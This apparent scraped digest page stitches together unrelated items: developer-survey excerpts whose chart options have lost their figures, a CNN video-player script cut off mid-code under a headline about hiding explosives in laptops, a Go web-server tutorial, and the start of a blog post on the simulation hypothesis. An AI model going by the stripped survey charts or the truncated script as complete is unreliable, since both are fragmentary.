We will publish additional analysis related to respondents’ disability status in the coming weeks.

Parents' Education Level

Some college/university study, no bachelor's degree

Primary/elementary school

34,938 responses

We asked respondents, “What is the highest level of education received by either of your parents?” Similar to ethnicity and disability status, this is the first year we asked this question. We asked this question in part because public policy researchers and some employers seek information about first-generation college students to improve their efforts to support them.

We will publish additional analysis on this in the coming weeks.

Developer Role and Gender

Developer Role and Gender The dashed line shows the average ratio of men's to women's participation

While the sample as a whole skewed heavily male, women were more likely to be represented in some developer roles than others. They were proportionally more represented among data scientists, mobile and web developers, quality assurance engineers, and graphic designers. The dashed line shows the average ratio for all of these developer roles.

Developer Role and Ethnicity

Desktop applications developer

Developer with a statistics or mathematics background

Embedded applications/devices developer

Quality assurance engineer

Machine learning specialist

18,770 responses

Desktop applications developer

Developer with a statistics or mathematics background

Embedded applications/devices developer

Machine learning specialist

Quality assurance engineer

2,009 responses

Desktop applications developer

Developer with a statistics or mathematics background

Embedded applications/devices developer

Machine learning specialist

Quality assurance engineer

1,412 responses

Desktop applications developer

Developer with a statistics or mathematics background

Embedded applications/devices developer

Machine learning specialist

Quality assurance engineer

1,063 responses

Respondents who identified as White or of European descent were less likely to report being a mobile developer than those who identified as South Asian, Hispanic or Latino/Latina, or East Asian. A higher proportion of respondents who identified as Hispanic or Latino/Latina selected “web developer” as an option compared to those who selected White or of European descent, South Asian, or East Asian.

Important note: We didn't receive enough responses from developers who identify as Black or of African descent on this question to include them in this plot with reliable percentages. However, we do see that many developers who identify as Black or of African descent work as web developers and mobile developers.

Years of Coding Experience and Demographics

Female

Male

29,255 responses

White or of European descent

Native American, Pacific Islander, or Indigenous Australian

Hispanic or Latino/Latina

Black or of African descent

Mean of 33,004 responses

Between respondents who identified as men or women, nearly twice the number of women said they had been coding for less than a year. On average, respondents who identified as White or of European descent and those who identified as Pacific Islander or Indigenous Australian had the highest average number of years experience coding.

Educational Attainment

I never completed any formal education

Primary/elementary school

Some college/university study without earning a bachelor’s degree

51,392 responses

Among current professional developers globally, 76.5% of respondents said they had a bachelor’s degree or higher, such as a Master’s degree or equivalent.

Undergraduate Major

Computer science or software engineering

Computer engineering or electrical/electronics engineering

Computer programming or Web development

Information technology, networking, or system administration

A non-computer-focused engineering discipline

Mathematics or statistics

Management information systems

Fine arts or performing arts

42,841 responses; select all that apply

More than half (54.2%) of professional developers who had studied at a college or university said they had concentrated their studies on computer science or software engineering, and an additional quarter (24.9%) majored in a closely-related discipline such as computer programming, computer engineering, or information technology. The remaining 20.9% said they had majored in other fields such as business, the social sciences, natural sciences, non-computer engineering, or the arts.

Among current students who responded to the survey, 48.3% said they were majoring in computer science or software engineering, and 30.5% said they were majoring in closely-related fields. Finally, 21.2% said they were focusing on other fields.

Importance of Formal Education

23,355 responses

Of current professional developers, 32% said their formal education was not very important or not important at all to their career success. This is not entirely surprising given that 90% of developers overall consider themselves at least somewhat self-taught: a formal degree is only one aspect of their education, and so much of their practical day-to-day work depends on their company’s individual tech stack decisions.

However, computer science majors and computer engineering majors were the most likely (49.4%) to say their formal education was important or very important.

Compared to computer science majors, respondents who majored in less theoretical computer-related disciplines (such as IT, web development, or computer programming) were more likely to say their formal educations were unimportant.

Other Types of Education

Open source contributions

30,354 responses; select all that apply

Developers love to learn: 90% say they are at least partially self-taught. Among current professional developers, 55.9% say they’ve taken an online course, and 53.4% say they’ve received on-the-job training.

Ways Developers Teach Themselves

Non-Stack online communities

Company internal community

26,735 responses; select all that apply

By far, reading official documentation and using Stack Overflow Q&A are the two most common ways developers level up their skills.

Bootcamp Success

I already had a job as a developer when I started the program

I got a job as a developer before completing the program

Immediately upon graduating

I haven't gotten a job as a developer yet

2,602 responses

Due to the high demand for professional developers, coding bootcamps have exploded in popularity in the past few years. Although commonly perceived as a way for non-developers to transition into a new career, we found that 45.8% of those who said they’d gone through a bootcamp were already developers when they started the program. This is likely because many developers decide at various parts in their career that they need to upgrade their skills or learn new technologies to stay relevant in the job market.

Program as a Hobby

Yes, I program as a hobby

Yes, I contribute to open source projects

51,392 responses

Coding isn’t just a career; it can be a passion. Among all developers, 75.0% code as a hobby; even among professional developers a similar proportion (73.9%) do so. Additionally, 32.7% of developers said they contribute to open source projects.

What Kind of Learning Do Developers Recommend?

Buy books and work through the exercises

Part-time/evening courses

Contribute to open source

Participate in online coding competitions

Participate in hackathons

23,568 responses; select all that apply

Want to learn to code but don’t know where to start? More developers say you should take an online course than any other method, followed by getting a book and working through the exercises.

As an important side note, we received great feedback on how we phrased this question, specifically the option, “Get a job as a QA tester and work your way into a developer role.” Although some developers start their careers as QA testers, the phrasing made it sound as if we saw QA as just a stepping stone, rather than a vital function and career option. QA professionals are our heroes (and QA engineers are 3.5% of our respondents this year!), and we apologize for not more carefully crafting our language.

Close this section

AQAP trying to hide explosives in laptops, official says

');$vidEndSlate.removeClass('video__end-slate--inactive').addClass('video__end-slate--active');}};CNN.autoPlayVideoExist = (CNN.autoPlayVideoExist === true) ? true : false;var configObj = {thumb: 'none',video: 'world/2017/03/21/airline-electronics-ban-what-you-need-to-know-burke-sdg-orig.cnn',width: '100%',height: '100%',section: 'international',profile: 'expansion',network: 'cnn',markupId: 'large-media_0',adsection: 'const-article-carousel-pagetop',frameWidth: '100%',frameHeight: '100%',posterImageOverride: {"mini":{"height":124,"width":220,"type":"jpg","uri":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-small-169.jpg"},"xsmall":{"height":173,"width":307,"type":"jpg","uri":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-medium-plus-169.jpg"},"small":{"height":259,"width":460,"type":"jpg","uri":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-large-169.jpg"},"medium":{"height":438,"width":780,"type":"jpg","uri":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-exlarge-169.jpg"},"large":{"height":619,"width":1100,"type":"jpg","uri":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-super-169.jpg"},"full16x9":{"height":900,"width":1600,"type":"jpg","uri":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-full-169.jpg"},"mini1x1":{"height":120,"width":120,"type":"jpg","uri":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-small-11.jpg"}}},autoStartVideo = false,callbackObj,containerEl,currentVideoCollection = [{"title":"Airline electronics ban: What you need to know","duration":"01:51","sourceName":"CNN","sourceLink":"","videoCMSUrl":"/video/data/3.0/video/world/2017/03/21/airline-electronics-ban-what-you-need-to-know-burke-sdg-orig.cnn/index.xml","videoId":"world/2017/03/21/airline-electronics-ban-what-you-need-to-know-burke-sdg-orig.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-large-169.jpg","videoUrl":"/videos/world/2017/03/21/airline-electronics-ban-what-you-need-to-know-burke-sdg-orig.cnn/video/playlists/electronics-airline-ban/","descriptionText":"The US and UK have banned people flying direct from much of the Middle East and North Africa from carrying laptops, tablets and other large electronic devices in the airplane cabin because of concerns about terrorism."},{"title":"How airline electronic ban affects travelers","duration":"01:56","sourceName":"CNN","sourceLink":"","videoCMSUrl":"/video/data/3.0/video/world/2017/03/21/electronic-travel-ban-orig-sg.cnn/index.xml","videoId":"world/2017/03/21/electronic-travel-ban-orig-sg.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321182015-electronics-ban-cover-image-large-169.jpeg","videoUrl":"/videos/world/2017/03/21/electronic-travel-ban-orig-sg.cnn/video/playlists/electronics-airline-ban/","descriptionText":"We asked people to tell us how they could be affected by the ban — here's how they responded on WhatsApp."},{"title":"US, UK ban electronics on some inbound flights ","duration":"01:57","sourceName":"CNN","sourceLink":"http://www.cnn.com/","videoCMSUrl":"/video/data/3.0/video/cnnmoney/2017/03/21/airline-electronics-ban-middle-east-africa-gorani-pkg.cnn/index.xml","videoId":"cnnmoney/2017/03/21/airline-electronics-ban-middle-east-africa-gorani-pkg.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321154948-mobapp-electronic-ban-large-169.jpg","videoUrl":"/videos/cnnmoney/2017/03/21/airline-electronics-ban-middle-east-africa-gorani-pkg.cnn/video/playlists/electronics-airline-ban/","descriptionText":"The US and UK banned carrying laptops, tablets and other large electronic devices in the airplane cabin for people flying from much of the Middle East and North Africa. \u003ca href=\"http://www.cnn.com/profiles/hala-gorani-profile\">CNN's Hala Gorani\u003c/a> explains."},{"title":"Air passengers face electronics ban","duration":"01:34","sourceName":"CNN","sourceLink":"http://www.cnn.com","videoCMSUrl":"/video/data/3.0/video/world/2017/03/21/air-passengers-face-electronics-ban-quest.cnn/index.xml","videoId":"world/2017/03/21/air-passengers-face-electronics-ban-quest.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321131928-airline-laptop-tease-03-21-large-169.jpg","videoUrl":"/videos/world/2017/03/21/air-passengers-face-electronics-ban-quest.cnn/video/playlists/electronics-airline-ban/","descriptionText":"New US regulations will force airlines flying directly from eight countries to prevent passengers from carrying a number of electronic devices in the cabin. CNN's Richard Quest reports."},{"title":"Electronics banned from cabins on some flights ","duration":"01:41","sourceName":"CNN","sourceLink":"http://www.cnn.com/","videoCMSUrl":"/video/data/3.0/video/cnnmoney/2017/03/20/electronics-banned-some-us-flights-marsh-lead.cnn/index.xml","videoId":"cnnmoney/2017/03/20/electronics-banned-some-us-flights-marsh-lead.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170320170025-02-plane-photo-large-169.jpg","videoUrl":"/videos/cnnmoney/2017/03/20/electronics-banned-some-us-flights-marsh-lead.cnn/video/playlists/electronics-airline-ban/","descriptionText":"Airlines that fly from certain countries in the Middle East and Africa to the US must require passengers to check in almost all electronic devices rather than carry them into the cabin, said a US official. CNN's \u003ca href=\"http://www.cnn.com/profiles/rene-marsh-profile\">Rene Marsh\u003c/a> reports. "}],currentVideoCollectionId = '',isLivePlayer = false,moveToNextTimeout,mutePlayerEnabled = false,nextVideoId = '',nextVideoUrl = '',turnOnFlashMessaging = false,videoPinner,videoEndSlateImpl;if (CNN.autoPlayVideoExist === false) {autoStartVideo = true;if (autoStartVideo === true) {if (turnOnFlashMessaging === true) {autoStartVideo = false;containerEl = jQuery(document.getElementById(configObj.markupId));CNN.VideoPlayer.showFlashSlate(containerEl);} else {CNN.autoPlayVideoExist = true;}}}configObj.autostart = autoStartVideo;CNN.VideoPlayer.setPlayerProperties(configObj.markupId, autoStartVideo, isLivePlayer, mutePlayerEnabled);CNN.VideoPlayer.setFirstVideoInCollection(currentVideoCollection, configObj.markupId);var videoHandler = {},isFeaturedVideoCollectionHandlerAvailable = (CNN !== undefined &&CNN.VIDEOCLIENT !== undefined &&CNN.VIDEOCLIENT.FeaturedVideoCollectionHandler !== undefined);if (!isFeaturedVideoCollectionHandlerAvailable) {/* ajax is used over getScript since getScript does not cache the responses. */CNN.INJECTOR.executeFeature('videx').done(function () {jQuery.ajax({dataType: 'script',cache: true,url: '//edition.i.cdn.cnn.com/.a/2.11.0/js/featured-video-collection-player.min.js'}).done(function () {initializeVideoAndCollection();}).fail(function () {throw 'Unable to fetch /js/featured-video-collection-player.min.js';});}).fail(function () {throw 'Unable to fetch the videx bundle';});}function initializeVideoAndCollection() {videoHandler = new CNN.VIDEOCLIENT.FeaturedVideoCollectionHandler(configObj.markupId,"cn-featured-8iwzm1",'js-video_description-featured-8iwzm1',[{"title":"Airline electronics ban: What you need to know","duration":"01:51","sourceName":"CNN","sourceLink":"","videoCMSUrl":"/video/data/3.0/video/world/2017/03/21/airline-electronics-ban-what-you-need-to-know-burke-sdg-orig.cnn/index.xml","videoId":"world/2017/03/21/airline-electronics-ban-what-you-need-to-know-burke-sdg-orig.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321070029-cnnmoney-airline-ban-illo-large-169.jpg","videoUrl":"/videos/world/2017/03/21/airline-electronics-ban-what-you-need-to-know-burke-sdg-orig.cnn/video/playlists/electronics-airline-ban/","descriptionText":"The US and UK have banned people flying direct from much of the Middle East and North Africa from carrying laptops, tablets and other large electronic devices in the airplane cabin because of concerns about terrorism."},{"title":"How airline electronic ban affects travelers","duration":"01:56","sourceName":"CNN","sourceLink":"","videoCMSUrl":"/video/data/3.0/video/world/2017/03/21/electronic-travel-ban-orig-sg.cnn/index.xml","videoId":"world/2017/03/21/electronic-travel-ban-orig-sg.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321182015-electronics-ban-cover-image-large-169.jpeg","videoUrl":"/videos/world/2017/03/21/electronic-travel-ban-orig-sg.cnn/video/playlists/electronics-airline-ban/","descriptionText":"We asked people to tell us how they could be affected by the ban — here's how they responded on WhatsApp."},{"title":"US, UK ban electronics on some inbound flights ","duration":"01:57","sourceName":"CNN","sourceLink":"http://www.cnn.com/","videoCMSUrl":"/video/data/3.0/video/cnnmoney/2017/03/21/airline-electronics-ban-middle-east-africa-gorani-pkg.cnn/index.xml","videoId":"cnnmoney/2017/03/21/airline-electronics-ban-middle-east-africa-gorani-pkg.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321154948-mobapp-electronic-ban-large-169.jpg","videoUrl":"/videos/cnnmoney/2017/03/21/airline-electronics-ban-middle-east-africa-gorani-pkg.cnn/video/playlists/electronics-airline-ban/","descriptionText":"The US and UK banned carrying laptops, tablets and other large electronic devices in the airplane cabin for people flying from much of the Middle East and North Africa. \u003ca href=\"http://www.cnn.com/profiles/hala-gorani-profile\">CNN's Hala Gorani\u003c/a> explains."},{"title":"Air passengers face electronics ban","duration":"01:34","sourceName":"CNN","sourceLink":"http://www.cnn.com","videoCMSUrl":"/video/data/3.0/video/world/2017/03/21/air-passengers-face-electronics-ban-quest.cnn/index.xml","videoId":"world/2017/03/21/air-passengers-face-electronics-ban-quest.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170321131928-airline-laptop-tease-03-21-large-169.jpg","videoUrl":"/videos/world/2017/03/21/air-passengers-face-electronics-ban-quest.cnn/video/playlists/electronics-airline-ban/","descriptionText":"New US regulations will force airlines flying directly from eight countries to prevent passengers from carrying a number of electronic devices in the cabin. CNN's Richard Quest reports."},{"title":"Electronics banned from cabins on some flights ","duration":"01:41","sourceName":"CNN","sourceLink":"http://www.cnn.com/","videoCMSUrl":"/video/data/3.0/video/cnnmoney/2017/03/20/electronics-banned-some-us-flights-marsh-lead.cnn/index.xml","videoId":"cnnmoney/2017/03/20/electronics-banned-some-us-flights-marsh-lead.cnn","videoImage":"http://i2.cdn.cnn.com/cnnnext/dam/assets/170320170025-02-plane-photo-large-169.jpg","videoUrl":"/videos/cnnmoney/2017/03/20/electronics-banned-some-us-flights-marsh-lead.cnn/video/playlists/electronics-airline-ban/","descriptionText":"Airlines that fly from certain countries in the Middle East and Africa to the US must require passengers to check in almost all electronic devices rather than carry them into the cabin, said a US official. CNN's \u003ca href=\"http://www.cnn.com/profiles/rene-marsh-profile\">Rene Marsh\u003c/a> reports. "}],'js-video_headline-featured-8iwzm1','',"js-video_source-featured-8iwzm1",true,true,'electronics-airline-ban');if (typeof configObj.context !== 'string' || configObj.context.length

Close this section

How I Start: Go (2014)

Go is a lovely little programming language designed by smart people you can trust and continuously improved by a large and growing open-source community.

Go is meant to be simple, but sometimes the conventions can be a little hard to grasp. I’d like to show you how I start all of my Go projects, and how to use Go’s idioms. Let’s build a backend service for a web app.

  1. Setting up your environment
  2. A new project
  3. Making a web server
  4. Adding more routes
  5. Querying multiple APIs
  6. Make it concurrent
  7. Simplicity
  8. Further exercises

Setting up your environment

The first step is, of course, to install Go. You can use the binary distribution for your operating system from the official site. If you use Homebrew on Mac, brew install go works well. When you’re done, this should work:

$ go version
go version go 1.3.1 darwin/amd64

Once installed, the only other thing to do is to set your GOPATH. This is the root directory that will hold all of your Go code and built artifacts. The Go tooling will create 3 subdirectories in your GOPATH: bin, pkg, and src. Some people set it to something like $HOME/go, but I prefer plain $HOME. Make sure it gets exported to your environment. If you use bash, something like this should work:

$ echo 'export GOPATH=$HOME' >> $HOME/.profile
$ source $HOME/.profile
$ go env | grep GOPATH
GOPATH="/Users/peter"

There are a lot of editors and plugins available for Go. I’m personally a huge fan of Sublime Text and the excellent GoSublime plugin. But the language is straightforward enough, especially for a small project, that a plain text editor is more than sufficient. I work with professional, full-time Go developers who still use vanilla vim, without even syntax highlighting. You definitely don’t need more than that to get started. As always, simplicity is king.

A new project

With a functioning environment, we’ll make a new directory for the project. The Go toolchain expects all source code to exist within $GOPATH/src, so we always work there. The toolchain can also directly import and interact with projects hosted on sites like GitHub or Bitbucket, assuming they live in the right place.

For this example, create a new, empty repository on GitHub. I’ll assume it’s called “hello”. Then, make a home for it in your $GOPATH.

$ mkdir -p $GOPATH/src/github.com/your-username
$ cd $GOPATH/src/github.com/your-username
$ git clone [email protected]:your-username/hello
$ cd hello

Great. Create main.go, which will be our absolute-minimum Go program.

package main

func main() {
    println("hello!")
}

Invoke go build to compile everything in the current directory. It’ll produce a binary with the same name as the directory.

$ go build
$ ./hello
hello!

Easy! Even after several years of writing Go, I still start all of my new projects like this. An empty git repo, a main.go, and a little bit of typing.

Since we took care to follow the common conventions, your application is automatically go get-able. If you commit and push this single file to GitHub, anyone with a working Go installation should be able to do this:

$ go get github.com/your-username/hello
$ $GOPATH/bin/hello
hello!

Making a web server

Let’s turn our hello, world into a web server. Here’s the full program.

package main

import "net/http"

func main() {
    http.HandleFunc("/", hello)
    http.ListenAndServe(":8080", nil)
}

func hello(w http.ResponseWriter, r *http.Request) {
    w.Write([]byte("hello!"))
}

There’s a little bit to unpack. First, we need to import the net/http package from the standard library.

Then, in the main function, we install a handler function at the root path of our webserver. http.HandleFunc operates on the default HTTP router, officially called a ServeMux.

http.HandleFunc("/", hello)

The function hello is an http.HandlerFunc, which means it has a specific type signature, and can be passed as an argument to HandleFunc. Every time a new request comes into the HTTP server matching the root path, the server will spawn a new goroutine executing the hello function. And the hello function simply uses the http.ResponseWriter to write a response to the client. Since http.ResponseWriter.Write takes the more general []byte, or byte-slice, as a parameter, we do a simple type conversion of our string.

func hello(w http.ResponseWriter, r *http.Request) {
    w.Write([]byte("hello!"))
}

Finally, we start the HTTP server on port 8080 and with the default ServeMux via http.ListenAndServe. That’s a synchronous, or blocking, call, which will keep the program alive until interrupted. Compile and run just as before.

$ go build
./hello

And in another terminal, or your browser, make an HTTP request.

$ curl http://localhost:8080
hello!

Easy! No frameworks to install, no dependencies to download, no project skeletons to create. Even the binary itself is native code, statically linked, with no runtime dependencies. Plus, the standard library’s HTTP server is production-grade, with defenses against common attacks. It can serve requests directly from the live internet—no intermediary required.

Adding more routes

We can do something more interesting than just say hello. Let’s take a city as input, call out to a weather API, and forward a response with the temperature. The OpenWeatherMap provides a simple and free API for current forecast info. Register for a free account to get an API key. OpenWeatherMap’s API can be queried by city. It returns responses like this (partially redacted):

{
    "name": "Tokyo",
    "coord": {
        "lon": 139.69,
        "lat": 35.69
    },
    "weather": [
        {
            "id": 803,
            "main": "Clouds",
            "description": "broken clouds",
            "icon": "04n"
        }
    ],
    "main": {
        "temp": 296.69,
        "pressure": 1014,
        "humidity": 83,
        "temp_min": 295.37,
        "temp_max": 298.15
    }
}

Go is a statically-typed language, so we should create a structure that mirrors this response format. We don’t need to capture every piece of information, just the stuff we care about. For now, let’s just get the city name and temperature, which is (hilariously) returned in Kelvin. We’ll define a struct to represent the data we need returned by the weather API.

type weatherData struct {
    Name string `json:"name"`
    Main struct {
        Kelvin float64 `json:"temp"`
    } `json:"main"`
}

The type keyword defines a new type, which we call weatherData, and declare as a struct. Each field in the struct has a name (e.g. Name, Main), a type (string, another anonymous struct), and what’s known as a tag. Tags are like metadata, and allow us to use the encoding/json package to directly unmarshal the API’s response into our struct. It’s a bit more typing compared to dynamic languages like Python or Ruby, but it gets us the highly desirable property of type safety. For more about JSON and Go, see this blog post, or this example code.

We’ve defined the structure, and now we need to define a way to populate it. Let’s write a function to do that.

func query(city string) (weatherData, error) {
    resp, err := http.Get("http://api.openweathermap.org/data/2.5/weather?APPID=YOUR_API_KEY&q=" + city)
    if err != nil {
        return weatherData{}, err
    }

    defer resp.Body.Close()

    var d weatherData

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return weatherData{}, err
    }

    return d, nil
}

The function takes a string representing the city, and returns a weatherData struct and an error. This is the fundamental error-handling idiom in Go. Functions encode behavior, and behaviors typically can fail. For us, the GET request against OpenWeatherMap can fail for any number of reasons, and the data returned might not be what we expect. In either case, we return a non-nil error to the client, who’s expected to deal it in a way that makes sense in the calling context.

If the http.Get succeeds, we defer a call to close the response body, which will execute when we leave the function scope (when we return from the query function) and is an elegant form of resource management. Meanwhile, we allocate a weatherData struct, and use a json.Decoder to unmarshal from the response body directly into our struct.

As an aside, the json.NewDecoder leverages an elegant feature of Go, which are interfaces. The Decoder doesn’t take a concrete HTTP response body; rather, it takes an io.Reader interface, which the http.Response.Body happens to satisfy. The Decoder supplies a behavior (Decode) which works just by invoking methods on types that satisfy other behaviors (Read). In Go, we tend to implement behavior in terms of functions operating on interfaces. It gives us a clean separation of data and control planes, easy testability with mocks, and code that’s a lot easier to reason about.

Finally, if the decode succeeds, we return the weatherData to the caller, with a nil error to indicate success. Now let’s wire that function up to a request handler.

http.HandleFunc("/weather/", func(w http.ResponseWriter, r *http.Request) {
    city := strings.SplitN(r.URL.Path, "/", 3)[2]

    data, err := query(city)
    if err != nil {
        http.Error(w, err.Error(), http.StatusInternalServerError)
        return
    }

    w.Header().Set("Content-Type", "application/json; charset=utf-8")
    json.NewEncoder(w).Encode(data)
})

Here, we’re definining the handler inline, rather than as a separate function. We use strings.SplitN to take everything in the path after /weather/ and treat it as the city. We make our query, and if there’s an error, we report it to the client with the http.Error helper function. We need to return at that point, so the HTTP request is completed. Otherwise, we tell our client that we’re going to send them JSON data, and use json.NewEncoder to JSON-encode the weatherData directly.

The code so far is nice and procedural, and easy to understand. No opportunity for misinterpretation, and no way to miss the common errors. If we move the “hello, world” handler to /hello, and make the necessary imports, we have our complete program:

package main

import (
    "encoding/json"
    "net/http"
    "strings"
)

func main() {
    http.HandleFunc("/hello", hello)

    http.HandleFunc("/weather/", func(w http.ResponseWriter, r *http.Request) {
        city := strings.SplitN(r.URL.Path, "/", 3)[2]

        data, err := query(city)
        if err != nil {
            http.Error(w, err.Error(), http.StatusInternalServerError)
            return
        }

        w.Header().Set("Content-Type", "application/json; charset=utf-8")
        json.NewEncoder(w).Encode(data)
    })

    http.ListenAndServe(":8080", nil)
}

func hello(w http.ResponseWriter, r *http.Request) {
    w.Write([]byte("hello!"))
}

func query(city string) (weatherData, error) {
    resp, err := http.Get("http://api.openweathermap.org/data/2.5/weather?APPID=YOUR_API_KEY&q=" + city)
    if err != nil {
        return weatherData{}, err
    }

    defer resp.Body.Close()

    var d weatherData

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return weatherData{}, err
    }

    return d, nil
}

type weatherData struct {
    Name string `json:"name"`
    Main struct {
        Kelvin float64 `json:"temp"`
    } `json:"main"`
}

Build and run it, same as before.

$ go build
$ ./hello
$ curl http://localhost:8080/weather/tokyo
{"name":"Tokyo","main":{"temp":295.9}}

Commit and push!

Querying multiple APIs

Maybe we can build a more accurate temperature for a city, by querying and averaging multiple weather APIs. Unfortunately for us, most weather APIs require authentication. So, get yourself an API key for Weather Underground.

Since we want the same behavior from all of our weather APIs, it makes sense to encode that behavior as an interface.

type weatherProvider interface {
    temperature(city string) (float64, error) // in Kelvin, naturally
}

Now, we can transform our old OpenWeatherMap query function into a type that satisfies the weatherProvider interface. Since we don’t need to store any state to make the HTTP GET, we’ll just use an empty struct. And we’ll add a simple line of logging, so we can see what’s happening.

type openWeatherMap struct{}

func (w openWeatherMap) temperature(city string) (float64, error) {
    resp, err := http.Get("http://api.openweathermap.org/data/2.5/weather?APPID=YOUR_API_KEY&q=" + city)
    if err != nil {
        return 0, err
    }

    defer resp.Body.Close()

    var d struct {
        Main struct {
            Kelvin float64 `json:"temp"`
        } `json:"main"`
    }

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return 0, err
    }

    log.Printf("openWeatherMap: %s: %.2f", city, d.Main.Kelvin)
    return d.Main.Kelvin, nil
}

Since we only want to extract the Kelvin temperature from the response, we can define the response struct inline. Otherwise, it’s pretty much the same as the query function, just defined as a method on an openWeatherMap struct. That way, we can use an instance of openWeatherMap as a weatherProvider.

Let’s do the same for the Weather Underground. The only difference is we need to provide an API key. We’ll store the key in the struct, and use it in the method. It will be a very similar function.

(Note that the Weather Underground doesn’t disambiguate cities quite as nicely as OpenWeatherMap. We’re skipping some important logic to handle ambiguous city names for the purposes of the example.)

type weatherUnderground struct {
    apiKey string
}

func (w weatherUnderground) temperature(city string) (float64, error) {
    resp, err := http.Get("http://api.wunderground.com/api/" + w.apiKey + "/conditions/q/" + city + ".json")
    if err != nil {
        return 0, err
    }

    defer resp.Body.Close()

    var d struct {
        Observation struct {
            Celsius float64 `json:"temp_c"`
        } `json:"current_observation"`
    }

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return 0, err
    }

    kelvin := d.Observation.Celsius + 273.15
    log.Printf("weatherUnderground: %s: %.2f", city, kelvin)
    return kelvin, nil
}

Now that we have a couple of weather providers, let’s write a function to query them all, and return the average temperature. For simplicity, if we encounter any errors, we’ll just give up.

func temperature(city string, providers ...weatherProvider) (float64, error) {
    sum := 0.0

    for _, provider := range providers {
        k, err := provider.temperature(city)
        if err != nil {
            return 0, err
        }

        sum += k
    }

    return sum / float64(len(providers)), nil
}

Notice that the function definition is very close to the weatherProvider temperature method. If we collect the individual weatherProviders into a type, and define the temperature method on that type, we can implement a meta-weatherProvider, comprised of other weatherProviders.

type multiWeatherProvider []weatherProvider

func (w multiWeatherProvider) temperature(city string) (float64, error) {
    sum := 0.0

    for _, provider := range w {
        k, err := provider.temperature(city)
        if err != nil {
            return 0, err
        }

        sum += k
    }

    return sum / float64(len(w)), nil
}

Perfect. We can pass a multiWeatherProvider anywhere that accepts a weatherProvider.

Now, we can wire that up to our HTTP server, very similar to before.

func main() {
    mw := multiWeatherProvider{
        openWeatherMap{},
        weatherUnderground{apiKey: "your-key-here"},
    }

    http.HandleFunc("/weather/", func(w http.ResponseWriter, r *http.Request) {
        begin := time.Now()
        city := strings.SplitN(r.URL.Path, "/", 3)[2]

        temp, err := mw.temperature(city)
        if err != nil {
            http.Error(w, err.Error(), http.StatusInternalServerError)
            return
        }

        w.Header().Set("Content-Type", "application/json; charset=utf-8")
        json.NewEncoder(w).Encode(map[string]interface{}{
            "city": city,
            "temp": temp,
            "took": time.Since(begin).String(),
        })
    })

    http.ListenAndServe(":8080", nil)
}

Compile, run, and GET, just as before. In addition to the JSON response, you’ll see some output in your server logs.

$ ./hello
2015/01/01 13:14:15 openWeatherMap: tokyo: 295.46
2015/01/01 13:14:16 weatherUnderground: tokyo: 273.15
$ curl http://localhost/weather/tokyo
{"city":"tokyo","temp":284.30499999999995,"took":"821.665230ms"}

Commit and push!

Make it concurrent

Right now we just query the APIs synchronously, one after the other. But there’s no reason we couldn’t query them at the same time. That should decrease our response times.

To do that, we leverage Go’s concurrency primitives: goroutines and channels. We’ll spawn each API query in its own goroutine, which will run concurrently. We’ll collect the responses in a single channel, and perform the average calculation when everything is finished.

func (w multiWeatherProvider) temperature(city string) (float64, error) {
    // Make a channel for temperatures, and a channel for errors.
    // Each provider will push a value into only one.
    temps := make(chan float64, len(w))
    errs := make(chan error, len(w))

    // For each provider, spawn a goroutine with an anonymous function.
    // That function will invoke the temperature method, and forward the response.
    for _, provider := range w {
        go func(p weatherProvider) {
            k, err := p.temperature(city)
            if err != nil {
                errs <- err
                return
            }
            temps <- k
        }(provider)
    }

    sum := 0.0

    // Collect a temperature or an error from each provider.
    for i := 0; i < len(w); i++ {
        select {
        case temp := <-temps:
            sum += temp
        case err := <-errs:
            return 0, err
        }
    }

    // Return the average, same as before.
    return sum / float64(len(w)), nil
}

Now, our requests take as long as the slowest individual weatherProvider. And we only needed to change the behavior of the multiWeatherProvider, which, notably, still satisfies the simple, synchronous weatherProvider interface.

Commit and push!

Simplicity

We’ve gone from ‘hello world’ to a concurrent, REST-ish backend server in a handful of steps and using only the Go standard library. Our code can be fetched and deployed on nearly any server architecture. The resulting binary is self-contained and fast. And, most importantly, the code is straightforward to read and reason about. It can easily be maintained and extended, as necessary. I believe all of these properties are a function of Go’s steady and philosophic devotion to simplicity. As Rob “Commander” Pike puts it, less is exponentially more.

Further exercises

Fork the final code on github.

Can you add another weatherProvider? (Hint: forecast.io is a good one.)

Can you implement a timeout in the multiWeatherProvider? (Hint: look at time.After.)

Close this section

Your yearly dose of is-the-universe-a-simulation

Yesterday Ryan Mandelbaum, at Gizmodo, posted a decidedly tongue-in-cheek piece about whether or not the universe is a computer simulation.  (The piece was filed under the category “LOL.”)

The immediate impetus for Mandelbaum’s piece was an blog post by Sabine Hossenfelder, a physicist who will likely be familiar to regulars here in the nerdosphere.  In her post, Sabine vents about the simulation speculations of philosophers like Nick Bostrom.  She writes:

Proclaiming that “the programmer did it” doesn’t only not explain anything – it teleports us back to the age of mythology. The simulation hypothesis annoys me because it intrudes on the terrain of physicists. It’s a bold claim about the laws of nature that however doesn’t pay any attention to what we know about the laws of nature.

